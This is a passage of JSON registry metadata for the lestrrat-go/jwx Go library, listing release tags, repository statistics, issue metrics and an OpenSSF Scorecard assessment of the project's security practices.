url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:58.203Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":6.082177034635306,"dependent_packages_count":5.700411654884096,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":5.891294344759701},"purl":"pkg:golang/github.com/lestrrat-go/jwx/v2/x25519","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/x25519","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/v2/x25519","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/v2/x25519/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fx25519/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fx25519/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fx25519/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fx25519/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fx25519/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fv2%2Fx25519/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":11403146,"name":"github.com/lestrrat-go/jwx/v2/internal/iter","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/internal","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2026-01-25T09:02:03.738Z","latest_release_number":null,"last_synced_at":"2026-05-10T03:02:21.142Z","created_at":"2025-03-04T15:27:55.994Z","updated_at":"2026-05-10T03:02:21.143Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/iter","install_command":"go get github.com/lestrrat-go/jwx/v2/internal/iter","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/internal/iter#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.11/manifests"},{"name":"v3.0.10","sha":"e14eb9b9730b352cb5f8854bbdf315bb98d1a5e0","kind":"commit","published_at":"2025-08-04T12:36:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.10","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.10/manifests"},{"name":"v3.0.9","sha":"8babbb1d64fda50d89276b5d52b1a682362334b2","kind":"commit","published_at":"2025-07-31T06:59:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.9","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.9/manifests"},{"name":"v3.0.8","sha":"7f3caf368dda160290bcc6952b4bfb549e308271","kind":"commit","published_at":"2025-06-27T10:33:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.8/manifests"},{"name":"v3.0.7","sha":"202bc50cf39999c4379eaaa593e4bd2aea9f870f","kind":"commit","published_at":"2025-06-16T00:42:56.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.7/manifests"},{"name":"v3.0.6","sha":"a68b08e71ab7cc4fb6098d2c453da41cc7a7967f","kind":"commit","published_at":"2025-06-13T11:06:37.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.6/manifests"},{"name":"v3.0.5","sha":"c3404a9d9937bc0d7a0f89ecfbc1303fd108c67d","kind":"commit","published_at":"2025-06-11T00:58:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.5/manifests"},{"name":"v3.0.4","sha":"3f1f2b899191cf6c40404736681a180e479c84eb","kind":"commit","published_at":"2025-06-09T12:04:08.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.4/manifests"},{"name":"v3.0.3","sha":"b1a4fc672df21b754d9904306e80c9be22deeba4","kind":"commit","published_at":"2025-06-06T01:53:35.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.3/manifests"},{"name":"v3.0.2","sha":"542198a7a000125443d53107fbd55c9336943c4d","kind":"commit","published_at":"2025-06-03T12:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.2/manifests"},{"name":"v2.1.6","sha":"13e92f3eb3982c11fa6a19280e00e3256237cf87","kind":"commit","published_at":"2025-04-29T08:17:11.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.6/manifests"},{"name":"v3.0.1","sha":"374ec5920fce56373ebe3a9c89134a2d6f81d4cd","kind":"commit","published_at":"2025-04-29T08:15:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.1/manifests"},{"name":"v2.1.5","sha":"a980d2346e8d17ddab69742e30ca1070018b0bf6","kind":"commit","published_at":"2025-04-16T11:17:27.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v2.1.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v2.1.5/manifests"},{"name":"v1.2.31","sha":"26ecf5d02cf6226f49e703bdddcae54dcf5ae0da","kind":"commit","published_at":"2025-04-09T10:38:17.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.2.31","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.2.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.2.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.2.31/manifests"},{"name":"v3.0.0","sha":"8884a402374939b27c9b96782e9e60a31aed75f6","kind":"commit","published_at":"2025-03-31T23:45:01.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.0/manifests"},{"name":"v3.0.0-beta2","sha":"c44f4f6a7da1328f467d9c4a31f884bc7fd27fa6","kind":"commit","published_at":"2025-03-29T23:21:02.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.0-beta2","html_url":"https://github.com/lestrrat